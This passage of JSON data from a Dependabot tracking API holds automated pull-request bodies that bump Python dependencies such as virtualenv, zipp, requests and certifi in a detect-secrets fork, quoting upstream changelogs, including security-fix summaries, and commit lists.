changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev20.26.6 (2024-09-27)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.26.6\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e- Properly quote string placeholders in activation script templates to mitigate\n  potential command injection - by :user:`y5c4l3`. (:issue:`2768`)\n\u003ch2\u003ev20.26.5 (2024-09-17)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.26.5\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade embedded wheels: setuptools to \u003ccode\u003e75.1.0\u003c/code\u003e from \u003ccode\u003e74.1.2\u003c/code\u003e - by :user:\u003ccode\u003egaborbernat\u003c/code\u003e. (:issue:\u003ccode\u003e2765\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev20.26.4 (2024-09-07)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.26.4\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e- no longer create `()` output in console during activation of a virtualenv by .bat file. (:issue:`2728`)\n- Upgrade embedded wheels:\n\u003cul\u003e\n\u003cli\u003ewheel to \u003ccode\u003e0.44.0\u003c/code\u003e from \u003ccode\u003e0.43.0\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003epip to \u003ccode\u003e24.2\u003c/code\u003e from \u003ccode\u003e24.1\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003esetuptools to \u003ccode\u003e74.1.2\u003c/code\u003e from \u003ccode\u003e70.1.0\u003c/code\u003e (:issue:\u003ccode\u003e2760\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev20.26.3 (2024-06-21)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.26.3\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eUpgrade embedded wheels:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003esetuptools to \u003ccode\u003e70.1.0\u003c/code\u003e from \u003ccode\u003e69.5.1\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003epip to \u003ccode\u003e24.1\u003c/code\u003e from \u003ccode\u003e24.0\u003c/code\u003e (:issue:\u003ccode\u003e2741\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev20.26.2 (2024-05-13)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.26.2\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e- ``virtualenv.pyz`` no longer fails when zipapp path contains a symlink - by :user:`HandSonic` and :user:`petamas`. (:issue:`1949`)\n- Fix bad return code from activate.sh if hashing is disabled - by :user:'fenkes-ibm'. (:issue:`2717`)\n\u003ch2\u003ev20.26.1 (2024-04-29)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.26.1\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/ec04726d065372ffad9920998aef1ce41252a61d\"\u003e\u003ccode\u003eec04726\u003c/code\u003e\u003c/a\u003e release 20.26.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/86dddeda7c991f8529e1995bbff280fb7b761972\"\u003e\u003ccode\u003e86ddded\u003c/code\u003e\u003c/a\u003e Fix \u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2768\"\u003e#2768\u003c/a\u003e: Quote template strings in activation scripts (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2771\"\u003e#2771\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/6bb3f6226c18d69bb6cfa3475b6d46dd463bb530\"\u003e\u003ccode\u003e6bb3f62\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2769\"\u003e#2769\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/220d49c2e3ade2ed24f5712ab5a23895cde2e04c\"\u003e\u003ccode\u003e220d49c\u003c/code\u003e\u003c/a\u003e Bump pypa/gh-action-pypi-publish from 1.10.1 to 1.10.2 (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2767\"\u003e#2767\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/cf340c83c2828a92def78c77b3e037a2baa4d557\"\u003e\u003ccode\u003ecf340c8\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2766\"\u003e#2766\u003c/a\u003e from pypa/release-20.26.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/f3172b4da576b88275a14d2e7bbeb98b8f958a05\"\u003e\u003ccode\u003ef3172b4\u003c/code\u003e\u003c/a\u003e release 20.26.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/22b9795eb6bed0c17d0415c5513eca099a0a11ad\"\u003e\u003ccode\u003e22b9795\u003c/code\u003e\u003c/a\u003e Use uv over pip (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2765\"\u003e#2765\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/35d8269aba12a1e3c60183a2082b2c4d0cc1192f\"\u003e\u003ccode\u003e35d8269\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2764\"\u003e#2764\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/ee77feb77ccb3c5deefa318630c59315bcfda521\"\u003e\u003ccode\u003eee77feb\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2763\"\u003e#2763\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/c5160566293ed098ca30e0856dbf44588dd5c3a3\"\u003e\u003ccode\u003ec516056\u003c/code\u003e\u003c/a\u003e Update README.md\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.2.1...20.26.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `zipp` from 3.4.0 to 3.19.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jaraco/zipp/blob/main/NEWS.rst\"\u003ezipp's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003ev3.19.1\u003c/h1\u003e\n\u003ch2\u003eBugfixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImproved handling of malformed zip files. (\u003ca href=\"https://redirect.github.com/jaraco/zipp/issues/119\"\u003e#119\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003ev3.19.0\u003c/h1\u003e\n\u003ch2\u003eFeatures\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement is_symlink. (\u003ca href=\"https://redirect.github.com/jaraco/zipp/issues/117\"\u003e#117\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003ev3.18.2\u003c/h1\u003e\n\u003cp\u003eNo significant changes.\u003c/p\u003e\n\u003ch1\u003ev3.18.1\u003c/h1\u003e\n\u003cp\u003eNo significant changes.\u003c/p\u003e\n\u003ch1\u003ev3.18.0\u003c/h1\u003e\n\u003ch2\u003eFeatures\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eBypass ZipFile.namelist in glob for better performance. (\u003ca href=\"https://redirect.github.com/jaraco/zipp/issues/106\"\u003e#106\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRefactored glob functionality to support a more generalized solution with support for platform-specific path separators. (\u003ca href=\"https://redirect.github.com/jaraco/zipp/issues/108\"\u003e#108\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eBugfixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd special accounting for pypy when computing the stack level for text encoding warnings. (\u003ca href=\"https://redirect.github.com/jaraco/zipp/issues/114\"\u003e#114\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003ev3.17.0\u003c/h1\u003e\n\u003cp\u003eFeatures\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/6d1cb72aa55e0536f35d2af128994b5a61ca4c1a\"\u003e\u003ccode\u003e6d1cb72\u003c/code\u003e\u003c/a\u003e Finalize\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/fd604bd34f0343472521a36da1fbd22e793e14fd\"\u003e\u003ccode\u003efd604bd\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/jaraco/zipp/issues/120\"\u003e#120\u003c/a\u003e from jaraco/bugfix/119-malformed-paths\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/c18417ed2953e181728a7dac07bff88a2190abf7\"\u003e\u003ccode\u003ec18417e\u003c/code\u003e\u003c/a\u003e Add news fragment.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/58115d2be968644ce71ce6bcc9b79826c82a1806\"\u003e\u003ccode\u003e58115d2\u003c/code\u003e\u003c/a\u003e Employ SanitizedNames in CompleteDirs. Fixes broken test.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/564fcc10cdbfdaecdb33688e149827465931c9e0\"\u003e\u003ccode\u003e564fcc1\u003c/code\u003e\u003c/a\u003e Add SanitizedNames mixin.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/79a309fe54dc6b7934fb72e9f31bcb58f2e9f547\"\u003e\u003ccode\u003e79a309f\u003c/code\u003e\u003c/a\u003e Add some assertions about malformed paths.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/2d015c22348fab46ca765339f55f84fe9d6e8115\"\u003e\u003ccode\u003e2d015c2\u003c/code\u003e\u003c/a\u003e Merge \u003ca href=\"https://github.com/jaraco/skeleton\"\u003ehttps://github.com/jaraco/skeleton\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/a595a0fad054cd20b69d3e954c99174e3a548938\"\u003e\u003ccode\u003ea595a0f\u003c/code\u003e\u003c/a\u003e Rename extras to align with core metadata spec.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/608f90a6e74919501577a1312dc5c7d8e1d391d7\"\u003e\u003ccode\u003e608f90a\u003c/code\u003e\u003c/a\u003e Finalize\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/3a22d724acf874111b43f87f7110225122ec3de5\"\u003e\u003ccode\u003e3a22d72\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/jaraco/zipp/issues/118\"\u003e#118\u003c/a\u003e from jaraco/feature/is-symlink\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/jaraco/zipp/compare/v3.4.0...v3.19.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot merge` will merge this PR after your CI passes on it\n- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it\n- `@dependabot cancel merge` will cancel a previously requested merge and block automerging\n- `@dependabot reopen` will reopen this PR if it is closed\n- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/hashier/detect-secrets/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/hashier/detect-secrets/pull/3","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/hashier%2Fdetect-secrets/issues/3","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/3/packages"}},{"old_version":"1.8.1","new_version":"1.11.0","update_type":"minor","path":null,"pr_created_at":"2025-06-10T00:21:07.000Z","version_change":"1.8.1 → 1.11.0","issue":{"uuid":"2579756678","node_id":"PR_kwDOExOKTM6Zw_aG","number":6,"state":"open","title":"Bump the pip group across 1 directory with 12 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":0,"pull_request":true,"closed_at":null,"author_association":"NONE","state_reason":null,"created_at":"2025-06-10T00:21:07.000Z","updated_at":"2025-06-10T00:21:08.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"pip","update_count":12,"packages":[{"name":"requests","old_version":"2.23.0","new_version":"2.32.4","repository_url":"https://github.com/psf/requests"},{"name":"certifi","old_version":"2020.4.5.1","new_version":"2024.7.4","repository_url":"https://github.com/certifi/python-certifi"},{"name":"idna","old_version":"2.9","new_version":"3.7","repository_url":"https://github.com/kjd/idna"},{"name":"lxml","old_version":"4.5.0","new_version":"4.9.1","repository_url":"https://github.com/lxml/lxml"},{"name":"tqdm","old_version":"4.46.0","new_version":"4.66.3","repository_url":"https://github.com/tqdm/tqdm"},{"name":"urllib3","old_version":"1.25.9","new_version":"1.26.19","repository_url":"https://github.com/urllib3/urllib3"},{"name":"websockets","old_version":"8.1","new_version":"9.1","repository_url":"https://github.com/python-websockets/websockets"},{"name":"babel","old_version":"2.8.0","new_version":"2.9.1","repository_url":"https://github.com/python-babel/babel"},{"name":"bleach","old_version":"3.1.5","new_version":"3.3.0","repository_url":"https://github.com/mozilla/bleach"},{"name":"jinja2","old_version":"2.11.2","new_version":"3.1.6","repository_url":"https://github.com/pallets/jinja"},{"name":"py","old_version":"1.8.1","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"},{"name":"zipp","old_version":"3.1.0","new_version":"3.19.1","repository_url":"https://github.com/jaraco/zipp"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip group with 12 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [requests](https://github.com/psf/requests) | `2.23.0` | `2.32.4` |\n| [certifi](https://github.com/certifi/python-certifi) | `2020.4.5.1` | `2024.7.4` |\n| [idna](https://github.com/kjd/idna) | `2.9` | `3.7` |\n| [lxml](https://github.com/lxml/lxml) | `4.5.0` | `4.9.1` |\n| [tqdm](https://github.com/tqdm/tqdm) | `4.46.0` | `4.66.3` |\n| [urllib3](https://github.com/urllib3/urllib3) | `1.25.9` | `1.26.19` |\n| [websockets](https://github.com/python-websockets/websockets) | `8.1` | `9.1` |\n| [babel](https://github.com/python-babel/babel) | `2.8.0` | `2.9.1` |\n| [bleach](https://github.com/mozilla/bleach) | `3.1.5` | `3.3.0` |\n| [jinja2](https://github.com/pallets/jinja) | `2.11.2` | `3.1.6` |\n| [py](https://github.com/pytest-dev/py) | `1.8.1` | `1.11.0` |\n| [zipp](https://github.com/jaraco/zipp) | `3.1.0` | `3.19.1` |\n\n\nUpdates `requests` from 2.23.0 to 2.32.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/releases\"\u003erequests's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.32.4\u003c/h2\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6965\"\u003e#6965\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.3\u003c/h2\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.2\u003c/h2\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.1\u003c/h2\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.0\u003c/h2\u003e\n\u003cp\u003e2.32.0 (2024-05-20)\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md\"\u003erequests's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS.\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.0 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/021dc729f0b71a3030cefdbec7fb57a0e80a6cfd\"\u003e\u003ccode\u003e021dc72\u003c/code\u003e\u003c/a\u003e Polish up release tooling for last manual release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/821770e822a20a21b207b3907ea83878bda1d396\"\u003e\u003ccode\u003e821770e\u003c/code\u003e\u003c/a\u003e Bump version and add release notes for v2.32.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/59f8aa2adf1d3d06bcbf7ce6b13743a1639a5401\"\u003e\u003ccode\u003e59f8aa2\u003c/code\u003e\u003c/a\u003e Add netrc file search information to authentication documentation (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6876\"\u003e#6876\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/5b4b64c3467fd7a3c03f91ee641aaa348b6bed3b\"\u003e\u003ccode\u003e5b4b64c\u003c/code\u003e\u003c/a\u003e Add more tests to prevent regression of CVE 2024 47081\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7bc45877a86192af77645e156eb3744f95b47dae\"\u003e\u003ccode\u003e7bc4587\u003c/code\u003e\u003c/a\u003e Add new test to check netrc auth leak (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6962\"\u003e#6962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/96ba401c1296ab1dda74a2365ef36d88f7d144ef\"\u003e\u003ccode\u003e96ba401\u003c/code\u003e\u003c/a\u003e Only use hostname to do netrc lookup instead of netloc\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7341690e842a23cf18ded0abd9229765fa88c4e2\"\u003e\u003ccode\u003e7341690\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/psf/requests/issues/6951\"\u003e#6951\u003c/a\u003e from tswast/patch-1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6716d7c9f29df636643fa2489f98890216525cb0\"\u003e\u003ccode\u003e6716d7c\u003c/code\u003e\u003c/a\u003e remove links\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/a7e1c745dc23c18e836febd672416ed0c5d8d8ae\"\u003e\u003ccode\u003ea7e1c74\u003c/code\u003e\u003c/a\u003e Update docs/conf.py\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/c799b8167a13416833ad3b4f3298261a477e826f\"\u003e\u003ccode\u003ec799b81\u003c/code\u003e\u003c/a\u003e docs: fix dead links to kenreitz.org\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/psf/requests/compare/v2.23.0...v2.32.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `certifi` from 2020.4.5.1 to 2024.7.4\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/bd8153872e9c6fc98f4023df9c2deaffea2fa463\"\u003e\u003ccode\u003ebd81538\u003c/code\u003e\u003c/a\u003e 2024.07.04 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/295\"\u003e#295\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/06a2cbf21f345563dde6c28b60e29d57e9b210b3\"\u003e\u003ccode\u003e06a2cbf\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 6.0.5 to 6.1.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/294\"\u003e#294\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/13bba02b72bac97c432c277158bc04b4d2a6bc23\"\u003e\u003ccode\u003e13bba02\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.6 to 4.1.7 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/293\"\u003e#293\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/e8abcd0e62b334c164b95d49fcabdc9ecbca0554\"\u003e\u003ccode\u003ee8abcd0\u003c/code\u003e\u003c/a\u003e Bump pypa/gh-action-pypi-publish from 1.8.14 to 